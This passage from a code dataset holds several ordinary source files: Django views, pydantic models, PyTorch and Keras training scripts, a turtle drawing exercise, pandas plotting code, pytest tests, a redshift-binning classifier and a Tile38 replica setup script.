unique_tagbox_docs.items():\n#print('\\n{}\\n{}\\n{}'.format(doc_id, doc['url'][:20], doc['title'][:20]))\n\n\n\n","sub_path":"etl.py","file_name":"etl.py","file_ext":"py","file_size_in_byte":2255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"392955350","text":"from django.shortcuts import render, redirect\nfrom 
.models import Title, Text\nfrom .forms import TitleForm, TextForm\n\n# Create your views here.\ndef index(request):\n return render(request, 'practice_blogs/index.html', {})\n\ndef titles(request):\n titles = Title.objects.order_by('date_added')\n context = {'titles':titles}\n return render(request, 'practice_blogs/titles.html', context)\n\ndef title(request, title_id):\n title = Title.objects.get(id=title_id)\n texts = title.text_set.order_by('-date_added')\n context = {'title':title, 'texts':texts}\n return render(request, 'practice_blogs/title.html', context)\n\ndef new_title(request):\n if request.method != 'POST':\n form = TitleForm()\n\n else:\n form = TitleForm(data = request.POST)\n if form.is_valid():\n form.save()\n return redirect('practice_blogs:titles')\n\n context = {'form':form}\n return render(request, 'practice_blogs/new_title.html', context)\n\ndef new_text(request, title_id):\n title = Title.objects.get(id=title_id)\n\n if request.method != 'POST':\n form = TextForm()\n\n else:\n form = TextForm(data = request.POST )\n if form.is_valid():\n new_text = form.save(commit = False)\n new_text.title = title\n new_text.save()\n return redirect('practice_blogs:title', title_id=title_id)\n\n context = {'title':title, 'form':form}\n return render(request, 'practice_blogs/new_text.html', context)\n\ndef edit_text(request, tx_id):\n desc = Text.objects.get(id=tx_id)\n title = desc.title \n\n if request.method != 'POST':\n form = TextForm(instance = desc)\n\n else:\n form = TextForm(instance = desc, data = request.POST)\n if form.is_valid():\n form.save()\n return redirect('practice_blogs:title', title_id = title.id)\n\n context = {'title':title, 'desc':desc, 'form':form}\n return render(request, 'practice_blogs/edit_text.html', context)\n\n\n","sub_path":"practice_blogs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"284485668","text":"from pydantic.networks import EmailStr\r\nfrom auth_server.api.dependencies.queries_to_redis import exist_email, exist_username\r\nfrom datetime import datetime\r\nfrom typing import Optional\r\nfrom uuid import UUID\r\n\r\nfrom pydantic import BaseModel, validator\r\n\r\n\r\nclass User(BaseModel):\r\n user_id: int\r\n username: str\r\n full_name: str\r\n email: str\r\n\r\n\r\nclass UserInDB(User):\r\n hashed_password: str\r\n\r\n\r\nclass RefreshToken(BaseModel):\r\n refresh_token: UUID\r\n user_id: int\r\n fingerprint: str\r\n created_at: datetime\r\n expired_at: datetime\r\n unused: bool\r\n\r\n\r\nclass ResponseAuth(BaseModel):\r\n operation: str\r\n successful: bool\r\n\r\n\r\nclass TokenData(BaseModel):\r\n username: Optional[str] = None\r\n\r\n\r\nclass UsernameAndExist(BaseModel):\r\n username: str\r\n exist_username: bool\r\n\r\n\r\nclass EmailAndExist(BaseModel):\r\n email: str\r\n exist_email: bool\r\n\r\n\r\nclass UniqueUsernameAndEmail(BaseModel):\r\n username: UsernameAndExist\r\n email: EmailAndExist\r\n\r\n @validator(\"username\")\r\n def username_validation(cls, v: str):\r\n if v.exist_username:\r\n raise ValueError('Username already exists')\r\n if exist_username(v.username) != 0:\r\n raise ValueError('Username already exists')\r\n return v\r\n\r\n @validator(\"email\")\r\n def email_validation(cls, v: str):\r\n if v.exist_email:\r\n raise ValueError('Email already exists')\r\n if exist_email(v.email) != 0:\r\n raise ValueError('Email already exists')\r\n return v\r\n\r\n\r\nclass 
EmailRequest(BaseModel):\r\n email: EmailStr\r\n","sub_path":"auth_server/auth_server/models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"311331911","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torchvision.datasets import ImageFolder\nfrom PIL import Image\nimport numpy as np\nfrom torchvision import datasets, transforms\nfrom torch.autograd import Variable\nimport torch.optim as optim\nimport argparse\nfrom encoderCNN import *\n\nparser = argparse.ArgumentParser(description='PyTorch MNIST Example')\nparser.add_argument('--dataroot', default=\"data/\" ,help='path to dataset')\nparser.add_argument('--batch_size', type=int, default=64, metavar='N',\nhelp='input batch size for training (default: 64)')\nparser.add_argument('--no_cuda', action='store_true', default=False,\nhelp='disables CUDA training')\nparser.add_argument('--epochs', type=int, default=20, metavar='N',\nhelp='number of epochs to train (default: 10)')\nparser.add_argument('--code_size', type=int, default=1024, metavar='N',\nhelp='Encoded size (default: 256)')\nparser.add_argument('--lr', type=float, default=0.01, metavar='LR',\n help='learning rate (default: 0.01)')\nparser.add_argument('--momentum', type=float, default=0.5, metavar='M',\nhelp='SGD momentum (default: 0.5)')\nparser.add_argument('--train', default=True, action='store_true',\nhelp='training a ConvNet model on MNIST dataset')\nparser.add_argument('--log-interval', type=int, default=100, metavar='N',\nhelp='how many batches to wait before logging training status')\nparser.add_argument('--save_dir', type=str, default=\"cpc_model\", metavar='N',\nhelp='Where to save the encoder?')\nparser.add_argument('--model', type=str, default=\"cpc_encoder\", metavar='N',\nhelp='Name of saved model (Without .pth)')\nparser.add_argument('--test_batch_size', type=int, default=1000, metavar='N',\nhelp='input batch size for testing (default: 1000)')\nparser.add_argument('--dataset', type=str, default=\"MNIST\", metavar='N',\nhelp='Which dataset?(MNIST/CIFAR10)(Default: MNIST)')\nparser.add_argument('--use_cpc', type=bool, default=\"True\", metavar='N',\nhelp='Use CPC Features?(Default:True) set to False to use pixels flattened image.')\nargs = parser.parse_args()\n\nargs.cuda = not args.no_cuda and torch.cuda.is_available()\n\nkwargs = {'num_workers': 1, 'pin_memory': True} if args.cuda else {}\n\n\nif args.dataset==\"MNIST\":\n train_loader = torch.utils.data.DataLoader(\n datasets.MNIST(root=args.dataroot, train=True, download=True,\n transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])),\nbatch_size=args.batch_size, shuffle=True, **kwargs)\n\n test_loader = torch.utils.data.DataLoader(\n datasets.MNIST(root=args.dataroot, train=False, transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])),\nbatch_size=args.batch_size, shuffle=True, **kwargs)\n num_channels=1\nelse:\n train_loader = torch.utils.data.DataLoader(\n datasets.CIFAR10(root=args.dataroot, train=True, download=True,\n transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])),\nbatch_size=args.batch_size, shuffle=True, **kwargs)\n\n test_loader = torch.utils.data.DataLoader(\n datasets.CIFAR10(root=args.dataroot, train=False, transform=transforms.Compose([\n transforms.ToTensor(),\n 
transforms.Normalize((0.1307,), (0.3081,))\n ])),\nbatch_size=args.batch_size, shuffle=True, **kwargs)\n num_channels=3\n\nencoder = encoderCNN(num_channels,args.code_size)\nif args.cuda:\n\tencoder.to(\"cuda\")\nencoder.load_state_dict(torch.load(args.save_dir+\"/\"+args.model+\".pth\"))\n\nclass Classifier(nn.Module):\n\tdef __init__(self):\n\t\tsuper(Classifier,self).__init__()\n\t\tif args.use_cpc:\n\t\t\tself.linear=nn.Linear(args.code_size,10)\n\t\telse:\n\t\t\tself.linear=nn.Linear(32*32*3,10)\n\tdef forward(self,x):\n\t\tx=self.linear(x)\n\t\treturn F.log_softmax(x)\n\nmodel=Classifier()\nif args.cuda:\n\tmodel.to('cuda')\n\noptimizer=optim.Adam(model.parameters(), lr=0.001)\n\ndef train():\n\tmodel.train()\n\tfor batch_idx,(data,target) in enumerate(train_loader):\n\t\tif args.cuda:\n\t\t\tdata,target=data.to(\"cuda\"),target.to('cuda')\n\t\tif args.use_cpc:\n\t\t\tdata=encoder(data)\n\t\t\t#print(data.shape)\n\t\t\tdata=torch.mean(torch.mean(data,-1),-1)\n\t\t\t#print(data.shape)\n\t\telse:\n\t\t\tdata=data.view(data.shape[0],-1)\n\t\tdata,target=Variable(data),Variable(target)\n\t\toptimizer.zero_grad()\n\t\t#print(data.shape)\n\t\toutput = model(data)\n\t\t#print(output.shape)\n\t\tloss=F.nll_loss(output,target)\n\t\tloss.backward()\n\t\toptimizer.step()\n\t\tif batch_idx % args.log_interval == 0:\n\t\t\tprint('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n\t\t\t\tepoch, batch_idx * len(data), len(train_loader.dataset),\n\t\t\t\t100. * batch_idx / len(train_loader), loss.item()))\n\ndef validate():\n\tmodel.eval()\n\tcorrect=0\n\ttest_loss=0\n\tfor batch,(data,target) in enumerate(test_loader):\n\t\tif args.cuda:\n\t\t\tdata,target=data.to(\"cuda\"),target.to('cuda')\n\t\tif args.use_cpc:\n\t\t\tdata=encoder(data)\n\t\t\t#print(data.shape)\n\t\t\tdata=torch.mean(torch.mean(data,-1),-1)\n\t\t\t#print(data.shape)\n\t\telse:\n\t\t\tdata=data.view(data.shape[0],-1)\n\t\tdata,target=Variable(data),Variable(target)\n\t\twith torch.no_grad():\n\t\t\toutput = model(data)\n\t\t\ttest_loss += F.nll_loss(output, target, size_average=False).data.item() # sum up batch loss\n\t\t\tpred = output.data.max(1, keepdim=True)[1] # get the index of the max log-probability\n\t\t\tcorrect += pred.eq(target.data.view_as(pred)).cpu().sum()\n\n\ttest_loss /= len(test_loader.dataset)\n\tprint('\\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\\n'.format(\n\ttest_loss, correct, len(test_loader.dataset),\n\t100. 
* correct / len(test_loader.dataset)))\n\nif args.train:\n\tfor epoch in range(1,args.epochs+1):\n\t\ttrain()\n\t\tvalidate()\n","sub_path":"classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":5869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"103735155","text":"# Chapter 3\n# polygons.py - Program that creates an equilateral triangle\n# using the turtle module\n\n\nimport turtle\n\nwn = turtle.Screen()\nwn.bgcolor('black')\n\njosh = turtle.Turtle()\njosh.color('white')\njosh.pensize(2)\njosh.speed(2)\njosh.penup()\njosh.forward(-300)\njosh.pendown()\n\n# Creates an equilateral triangle\nfor i in range(3):\n josh.forward(40)\n josh.left(120)\n\njosh.penup()\njosh.forward(100)\njosh.pendown()\n\n# Creates a square\nfor j in range(4):\n josh.forward(40)\n josh.left(90)\n\njosh.penup()\njosh.forward(120)\njosh.pendown()\n\n# Creates a hexagon\nfor k in range(6):\n josh.forward(40)\n josh.left(60)\n\njosh.penup()\njosh.forward(140)\njosh.pendown()\n\n# Creates a octagon\nfor l in range(8):\n josh.forward(40)\n josh.left(45)\n\nwn.mainloop()\n","sub_path":"Chapter 3/polygons.py","file_name":"polygons.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"78750501","text":"import pandas as pd\nimport numpy as np\nimport matplotlib\nimport matplotlib.ticker as mtick\n\nmatplotlib.use('agg', warn=False, force=True)\nfrom matplotlib import pyplot as plt\nimport os\n\nfrom Webtest.settings import STATIC_URL, BASE_DIR\n\n\nclass ProcessFile:\n df = pd.DataFrame\n dcc = pd.DataFrame\n\n plotimage = \"\"\n\n def createDataframe(self, filename):\n\n # filepath = \"/Users/ajit/PycharmProjects/Webtest/templates/blogsite/Millburn.csv\"\n fileinp = 'static/Data/' + filename\n filepath = os.path.join(BASE_DIR, fileinp)\n # df = pd.read_csv(filepath, parse_dates=['Sale Date'], error_bad_lines=False)\n df = pd.read_csv(filepath, error_bad_lines=False)\n self.dfinp = df\n return df\n\n def plotgraph(self, fieldname):\n df = self.dfinp\n df1 = df[(df['Sale Date'] >= '1980-01-01') & (df['Sale Date'] <= '2020-01-01') & (df['Sale Price'] > 99999) & (\n df['Sale Price'] < 20000000)]\n df1['Year'] = pd.to_datetime(df1['Sale Date']).dt.to_period('Y')\n plt.style.use('seaborn-whitegrid')\n dfp = pd.pivot_table(df1, values='Sale Price', index=['Year'], columns=['Municipality'],\n aggfunc=np.count_nonzero)\n plt.rcParams['figure.figsize'] = 12, 6\n dfp.plot()\n relpath = 'static/images/temp1.png'\n filepath = os.path.join(BASE_DIR, relpath)\n plt.savefig(filepath)\n return relpath\n\n def getchoices(self):\n p = {}\n dlist = np.arange(1, len(self.dfinp.columns))\n clist = self.dfinp.columns\n for i in range(len(clist) - 3):\n p[dlist[i]] = clist[i]\n t = p.items()\n return t\n\n def get_columnlist(self):\n self\n return\n\n def getSalesPriceCount(self, df, type):\n\n fileinp = 'static/images/Essex/sales'\n fpath = os.path.join(BASE_DIR, fileinp)\n\n filelists = [file for file in os.listdir(fpath) if file.endswith('price.png')]\n filelistc = [file for file in os.listdir(fpath) if file.endswith('count.png')]\n\n filelists.sort()\n filelistc.sort()\n return filelists,filelistc\n\n def boxplotbymuni(self,tid,yfrom):\n\n df1 = self.df[(self.df['Sale Date'] >= yfrom+'-01-01') & (self.df['Sale Date'] <= '2018-01-01') & (self.df['Sale Price'] > 99999) & (\n self.df['Sale Price'] < 7500000)&(self.df['Municipality'] == int(tid))]\n df1['Code'] = 
df1['Municipality']\n df1['Sale Date'] = pd.to_datetime(df1['Sale Date'])\n df1['Yr'] = df1['Sale Date'].dt.to_period('Y')\n #dat = pd.merge(df1, self.dcc, on=['Code'])\n\n #f1 = dat[(dat['Code'] == int(tid)) & (dat['Sale Date'] >= '2000-01-01')]\n d1 = df1.pivot(columns='Yr', values='Sale Price')\n plt.figure(figsize=(18, 7))\n plt.xlabel('Year',fontsize=16)\n plt.ylabel('Sale Price',fontsize=16)\n title = 'Sale price of houses in ' + self.dcc[self.dcc['Code']==int(tid)].iloc[0,0]\n title = title + ', From Year : ' + yfrom\n plt.title(title, fontsize=20)\n d1.boxplot()\n fmt = '${x:,.0f}'\n tick = mtick.StrMethodFormatter(fmt)\n plt.gca().yaxis.set_major_formatter(tick)\n plt.ylim((25, 5000000))\n relpath = 'static/images/temp1.png'\n filepath = os.path.join(BASE_DIR, relpath)\n plt.savefig(filepath)\n return relpath\n","sub_path":"blogsite/ProcessFile.py","file_name":"ProcessFile.py","file_ext":"py","file_size_in_byte":3394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"629498580","text":"import argparse\nimport os\n\nimport numpy as np\nimport pandas as pd\nimport tensorflow\nfrom tensorflow.keras.callbacks import ModelCheckpoint\nfrom tensorflow.keras.layers import Lambda, Conv2D, Dropout, Dense, Flatten, Convolution2D, MaxPooling2D\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.optimizers import Adam\nfrom sklearn.model_selection import train_test_split\nfrom keras import backend as K\nfrom test_models.utils import IMAGE_HEIGHT, IMAGE_WIDTH, IMAGE_CHANNELS\n\nimport logging\nlogging.disable(logging.WARNING)\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"3\"\n\n# import warnings filter\nfrom warnings import simplefilter\n\n# ignore all future warnings\nsimplefilter(action='ignore', category=FutureWarning)\nfrom sklearn.utils import shuffle\n\nfrom test_models.batch_generator import Generator\nfrom test_models.utils import INPUT_SHAPE\n\nnp.random.seed(0)\n\ndef load_data(args):\n \"\"\"\n Load training data and split it into training and validation set\n \"\"\"\n tracks = [\"track1\"]\n drive = ['normal', 'recovery', 'reverse']\n\n x = None\n y = None\n path = None\n x_train = None\n y_train = None\n x_valid = None\n y_valid = None\n\n for track in tracks:\n for drive_style in drive:\n try:\n path = os.path.join(args.data_dir, track, drive_style, 'driving_log.csv')\n data_df = pd.read_csv(path)\n if x is None:\n x = data_df[['center', 'left', 'right']].values\n y = data_df['steering'].values\n else:\n x = np.concatenate((x, data_df[['center', 'left', 'right']].values), axis=0)\n y = np.concatenate((y, data_df['steering'].values), axis=0)\n except FileNotFoundError:\n print(\"Unable to read file %s\" % path)\n continue\n\n if x is None or y is None:\n print(\"No driving data were provided for training. 
Provide correct paths to the driving_log.csv files\")\n exit()\n\n try:\n x_train, x_valid, y_train, y_valid = train_test_split(x, y, test_size=args.test_size, random_state=0)\n except TypeError:\n print(\"Missing header to csv files\")\n exit()\n\n print(\"Train dataset: \" + str(len(x_train)) + \" elements\")\n print(\"Test dataset: \" + str(len(x_valid)) + \" elements\")\n return x_train, x_valid, y_train, y_valid\n\n\ndef build_model(args):\n \"\"\"\n Modified NVIDIA model\n \"\"\"\n model = Sequential()\n model.add(Lambda((lambda x: ((x / 127.5) - 1.0)), input_shape=INPUT_SHAPE))\n model.add(Conv2D(24, (5, 5), activation='elu', strides=(2, 2)))\n model.add(Conv2D(36, (5, 5), activation='elu', strides=(2, 2)))\n model.add(Conv2D(48, (5, 5), activation='elu', strides=(2, 2)))\n model.add(Conv2D(64, (3, 3), activation='elu'))\n model.add(Conv2D(64, (3, 3), activation='elu'))\n model.add(Dropout(args.keep_prob))\n model.add(Flatten())\n model.add(Dense(100, activation='elu'))\n model.add(Dense(50, activation='elu'))\n model.add(Dense(10, activation='elu'))\n model.add(Dense(1))\n\n model.summary()\n return model\n\n\ndef get_generators(args, x_train, x_valid, y_train, y_valid):\n x_train, y_train = shuffle(x_train, y_train, random_state=0)\n x_valid, y_valid = shuffle(x_valid, y_valid, random_state=0)\n\n x_train: 'x_train'\n y_train: 'y_train'\n\n train_generator = Generator(x_train, y_train, True, args)\n validation_generator = Generator(x_valid, y_valid, False, args)\n\n return train_generator, validation_generator\n\n\ndef train_model(model_dir, model, args, x_train, x_valid, y_train, y_valid):\n\n checkpoint = ModelCheckpoint('EPOCH' + '-{epoch:03d}.h5',\n monitor='val_loss',\n verbose=0,\n save_best_only=args.save_best_only, # save the model only if the val_loss gets low\n mode='auto',\n period=20)\n print(args.learning_rate)\n model.compile(loss='mean_squared_error', optimizer=Adam(lr=args.learning_rate))\n\n train_generator, validation_generator = get_generators(args, x_train, x_valid, y_train, y_valid)\n\n history = model.fit_generator(train_generator,\n validation_data=validation_generator,\n epochs=args.nb_epoch,\n callbacks=[checkpoint],\n verbose=1)\n # save the last model anyway (might not be the best)\n model.save(os.path.join(model_dir, \"udacity_trained.h5\"))\n\n score = model.evaluate_generator(train_generator)\n return [score, score]\n\n\ndef s2b(s):\n \"\"\"\n Converts a string to boolean value\n \"\"\"\n s = s.lower()\n return s == 'true' or s == 'yes' or s == 'y' or s == '1'\n\n\ndef main(mutation_final_name):\n model_dir = os.path.join('trained_models')\n model_loc = os.path.join(model_dir, mutation_final_name)\n\n parser = argparse.ArgumentParser(description='Behavioral Cloning Training Program')\n parser.add_argument('-d', help='data directory', dest='data_dir', type=str,\n default=os.path.join('..', 'Datasets', 'Udacity'))\n parser.add_argument('-t', help='test size fraction', dest='test_size', type=float, default=0.2)\n parser.add_argument('-k', help='drop out probability', dest='keep_prob', type=float, default=0.5)\n parser.add_argument('-n', help='number of epochs', dest='nb_epoch', type=int, default=50)\n parser.add_argument('-s', help='samples per epoch', dest='samples_per_epoch', type=int, default=100)\n parser.add_argument('-b', help='batch size', dest='batch_size', type=int, default=64)\n parser.add_argument('-o', help='save best models only', dest='save_best_only', type=s2b, default='true')\n parser.add_argument('-l', help='learning rate', 
dest='learning_rate', type=float, default=1.0e-4)\n args = parser.parse_args()\n print('-' * 30)\n print('Parameters')\n print('-' * 30)\n for key, value in vars(args).items():\n print('{:<20} := {}'.format(key, value))\n print('-' * 30)\n\n data = load_data(args)\n train_generator, validation_generator = get_generators(args, *data)\n\n if not os.path.exists(model_loc):\n print('model does not exist')\n import tensorflow as tf\n if tf.test.gpu_device_name():\n print('Default GPU Device: {}'.format(tf.test.gpu_device_name()))\n else:\n print(\"Please install GPU version of TF\")\n \"\"\"\n Load train/validation data set and train the model\n \"\"\"\n\n model = build_model(args)\n score = train_model(model_dir, model, args, *data)\n else:\n print('model exists')\n model = tensorflow.keras.models.load_model(model_loc)\n metric_value = model.evaluate_generator(train_generator)\n K.clear_session()\n score = [metric_value, metric_value]\n return score\n\nif __name__ == '__main__':\n\n main('')\n","sub_path":"test_models/train_self_driving_car_train.py","file_name":"train_self_driving_car_train.py","file_ext":"py","file_size_in_byte":6989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"358876515","text":"import pytest\nimport os, shutil\nimport json\nimport numpy as np\nimport openslide\nfrom openslide.deepzoom import DeepZoomGenerator\n\nfrom luna_pathology.common.preprocess import *\n\noutput_dir = \"tests/luna_pathology/common/testdata/output-123\"\nslide_path = \"tests/luna_pathology/common/testdata/123.svs\"\nscores_csv_path = \"tests/luna_pathology/common/testdata/input/tile_scores_and_labels.csv\"\nslide = openslide.OpenSlide(slide_path)\nimg_arr = get_downscaled_thumbnail(slide, 10)\n\ndef test_get_scale_factor_at_magnification_double():\n # slide scanned mag is 20\n res = get_scale_factor_at_magnfication(slide, 10)\n assert 2 == res\n\ndef test_get_scale_factor_at_magnification_error():\n # slide scanned mag is 20\n with pytest.raises(ValueError):\n get_scale_factor_at_magnfication(slide, 40)\n\ndef test_get_tile_color():\n\n res = get_tile_color(0.1)\n assert 3 == len(res)\n\ndef test_get_tile_color_str():\n\n res = get_tile_color(\"blue\")\n assert 3 == len(res)\n\ndef test_get_full_resolution_generator():\n\n generator, level = get_full_resolution_generator(slide, 128)\n assert isinstance(generator, DeepZoomGenerator)\n assert 12 == level\n\ndef test_get_downscaled_thumbnail():\n res = get_downscaled_thumbnail(slide, 10)\n\n assert isinstance(res, np.ndarray)\n\ndef test_array_to_slide():\n res = array_to_slide(img_arr)\n\n assert isinstance(res, openslide.ImageSlide)\n\ndef test_make_otsu():\n\n res = make_otsu(img_arr[:,:,1])\n\n assert 0 == np.count_nonzero(res[0])\n assert isinstance(res, np.ndarray)\n\ndef test_pretile_scoring(requests_mock):\n\n # setup\n os.makedirs(output_dir, exist_ok=True)\n\n params = {\"tile_size\":128,\n \"requested_magnification\":20,\n \"project_id\": \"project\",\n \"labelset\": \"default_labels\",\n \"filter\": {\n \"otsu_score\": 0.5\n },\n \"annotation_table_path\": \"tests/luna_pathology/common/testdata/project/tables/REGIONAL_METADATA_RESULTS\"\n }\n res = pretile_scoring(slide_path, output_dir,\n \"tests/luna_pathology/common/testdata/project/tables/REGIONAL_METADATA_RESULTS\",\n params, \"123\")\n\n print(res)\n assert 'tests/luna_pathology/common/testdata/output-123/tiles.slice.pil' == res['data']\n assert 'tests/luna_pathology/common/testdata/output-123/address.slice.csv' == res['aux']\n 
assert 'RGB' == res['pil_image_bytes_mode']\n assert 20 == res['full_resolution_magnification']\n assert ['coordinates', 'otsu_score', 'purple_score', 'regional_label'] == res['available_labels']\n assert '123.svs' == res['image_filename']\n\n # clean up\n shutil.rmtree(output_dir)\n\n\"\"\"\n# works on a cuda enabled env\ndef test_run_model():\n\n params = {\n \"model_package\": \"luna_pathology.models.eng_tissuenet\",\n \"model\": {\n \"checkpoint_path\": \"/gpfs/mskmindhdp_emc/user/shared_data_folder/kohlia/tile_classifier/ckpts/4.ckpt\",\n \"n_classes\": 5\n }\n }\n res = run_model('/gpfs/mskmindhdp_emc/data/TCGA-BRCA/TCGA-D8-A4Z1-01Z-00-DX1.D39D38B5-FC9F-4298-8720-016407DC6591/test_collect_tiles/tiles.slice.pil',\n '/gpfs/mskmindhdp_emc/data/TCGA-BRCA/TCGA-D8-A4Z1-01Z-00-DX1.D39D38B5-FC9F-4298-8720-016407DC6591/test_collect_tiles/address.slice.csv',\n 'tests/luna_pathology/common/testdata', params)\n\n print(res)\n\"\"\"\n","sub_path":"tests/luna_pathology/common/test_preprocess.py","file_name":"test_preprocess.py","file_ext":"py","file_size_in_byte":3422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"328206032","text":"\"\"\"\nThis is an example tomographic bin generator using a random forest.\n\nEvery classifier module needs to:\n - have construction of the type \n __init__ (self, bands, options) (see examples below)\n - implement two functions: \n train (self, training_data,training_z)\n apply (self, data).\n - define valid_options class varible.\n\nSee Classifier Documentation below.\n\"\"\"\n\nfrom .base import Tomographer\nimport numpy as np\nfrom sklearn.ensemble import RandomForestClassifier\nimport jax_cosmo.parameters\nimport jax_cosmo.background\n\n\nclass funbins(Tomographer):\n \"\"\" Random Forest Classifier \"\"\"\n \n # valid parameter -- see below\n valid_options = ['bins', 'seed', 'method', 'combinebins']\n # this settings means arrays will be sent to train and apply instead\n # of dictionaries\n wants_arrays = True\n \n def __init__ (self, bands, options):\n \"\"\"Constructor\n \n Parameters:\n -----------\n bands: str\n string containg valid bands, like 'riz' or 'griz'\n options: dict\n options come through here. Valid keys are listed as valid_options\n class variable. 
\n\n Note:\n -----\n Valid options are:\n 'bins' - number of tomographic bins\n 'seed' - the seed to use for RandomState\n 'method' - what method to use for binning: 'log', 'random', 'linear', 'chi'\n 'combinebins' - what 2 bins to combine as a list\n\n \"\"\"\n self.bands = bands\n self.opt = options\n\n def train (self, training_data, training_z):\n \"\"\"Trains the classifier\n \n Parameters:\n -----------\n training_data: numpy array, size Ngalaxies x Nbands\n training data, each row is a galaxy, each column is a band as per\n band defined above\n training_z: numpy array, size Ngalaxies\n true redshift for the training sample\n\n \"\"\"\n #reading in elements from yaml\n n_bin = self.opt['bins']\n \n if self.opt['seed'] is None:\n seed = 123\n print('The default seed is 123')\n else:\n seed = self.opt['seed']\n print(f'The seed is {seed}')\n \n if self.opt['method'] is None:\n method = 'log'\n print('The default method for binning has been set to log.')\n else:\n method = self.opt['method']\n assert method in ['log', 'random', 'linear', 'chi'], 'The method must be log, random, linear, or chi'\n print(f'The method has been set to {method}')\n \n if self.opt['combinebins'] is None:\n combine = None\n elif self.opt['combinebins'] is not None:\n combine = self.opt['combinebins']\n assert len(combine) == 2, \"You can only combine 2 bins at one time right now!\"\n print(f'You are combining bins {combine[0]} and {combine[1]}')\n \n #set up a reproducible random state\n gen = np.random.RandomState(seed)\n \n #find bins\n print(\"Finding bins for training data\")\n \n training_bin = np.zeros(training_z.size) \n \n if method == 'log':\n #creating percentile binning in logspace\n p = np.logspace(0, 2, n_bin + 1)\n z_edges = np.percentile(training_z, p)\n \n if method == 'random':\n #creating a random binning by pulling from a uniform distribution\n z_edges = gen.uniform(0, 3, n_bin - 1)\n z_edges = np.insert(z_edges, 0, np.min(training_z))\n z_edges = np.insert(z_edges, 0, np.max(training_z))\n z_edges.sort()\n \n if method == 'linear':\n #the given random forest linear binning\n p = np.linspace(0, 100, n_bin +1)\n z_edges = np.percentile(training_z, p)\n \n #can add stuff here about david's method if it can be generalized to n bins\n #n_bin = 8\n #training_bin = np.load('dc2-labels.npy')#[:len(training_z)]\n #print(len(training_bin)) \n \n if method == 'chi':\n z = np.asarray(training_z)\n # Tabulate comoving distance over a grid spanning the full range of input redshifts.\n zgrid = np.linspace(0, z.max(), 1000)\n agrid = 1 / (1 + zgrid)\n model = jax_cosmo.parameters.Planck15()\n chi_grid = jax_cosmo.background.radial_comoving_distance(model, agrid)\n # Compute bin edges that are equally spaced in chi.\n chi_edges = np.linspace(0, chi_grid[-1], n_bin + 1)\n z_edges = np.empty(n_bin + 1)\n z_edges[0] = 0.\n z_edges[-1] = z.max()\n z_edges[1:-1] = np.interp(chi_edges[1:-1], chi_grid, zgrid)\n \n \n # Now find all the objects in each of these bins\n for i in range(n_bin):\n z_low = z_edges[i]\n z_high = z_edges[i + 1]\n training_bin[(training_z > z_low) & (training_z < z_high)] = i\n \n if combine:\n max_ = np.max(training_bin)\n if combine[1] == max_:\n #combine the bins, combining the higher/max bin into the lower bin is also moving because its max bin\n training_bin[training_bin == combine[1]] = combine[0]\n if combine[1] != max_:\n #combine the bins\n training_bin[training_bin == combine[1]] = combine[0]\n #move the max bin into the empty spot\n training_bin[training_bin == max_] = 
combine[1]\n \n # for speed, cut down to 5% of original size\n cut = gen.uniform(0, 1, training_z.size) < 0.05\n training_bin = training_bin[cut]\n training_data = training_data[cut]\n\n # Can be replaced with any classifier\n classifier = RandomForestClassifier()\n\n print(\"Fitting classifier\")\n # Lots of data, so this will take some time\n classifier.fit(training_data, training_bin)\n\n self.classifier = classifier\n #self.z_edges = z_edges\n\n\n def apply (self, data):\n \"\"\"Applies training to the data.\n \n Parameters:\n -----------\n Data: numpy array, size Ngalaxes x Nbands\n testing data, each row is a galaxy, each column is a band as per\n band defined above\n\n Returns: \n tomographic_selections: numpy array, int, size Ngalaxies\n tomographic selection for galaxies return as bin number for \n each galaxy.\n \"\"\"\n tomo_bin = self.classifier.predict(data)\n return tomo_bin\n\n","sub_path":"tomo_challenge/classifiers/myclassifier.py","file_name":"myclassifier.py","file_ext":"py","file_size_in_byte":6636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"444676641","text":"import sys\nimport httplib\nimport json\nimport time\nimport subprocess\n\nurl1 = \"tile38-write\"\nurl2 = \"127.0.0.1\"\nport = 9851\n\nmaster_not_ready = True\nself_not_ready = True\n\ndef make_request(url):\n conn = httplib.HTTPConnection(url, port)\n conn.request(\"GET\", \"/server\")\n res = conn.getresponse()\n body = res.read().decode('utf-8')\n return json.loads(body)\n\ndef wait():\n sys.stdout.write('.')\n sys.stdout.flush()\n time.sleep(1)\n return\n\nwhile master_not_ready:\n try:\n obj = make_request(url1)\n if obj['stats']['num_objects'] > 10:\n master_not_ready = False\n subprocess.call([\"./tile38-cli\", \"FOLLOW\", \"tile38-write\", \"9851\"])\n subprocess.call([\"./tile38-cli\", \"READONLY\", \"yes\"])\n break\n except Exception as err:\n print(err)\n wait()\n\nwhile self_not_ready:\n try:\n obj = make_request(url2)\n if obj['stats']['num_objects'] > 10:\n self_not_ready = False\n break\n except Exception as err:\n print(err)\n 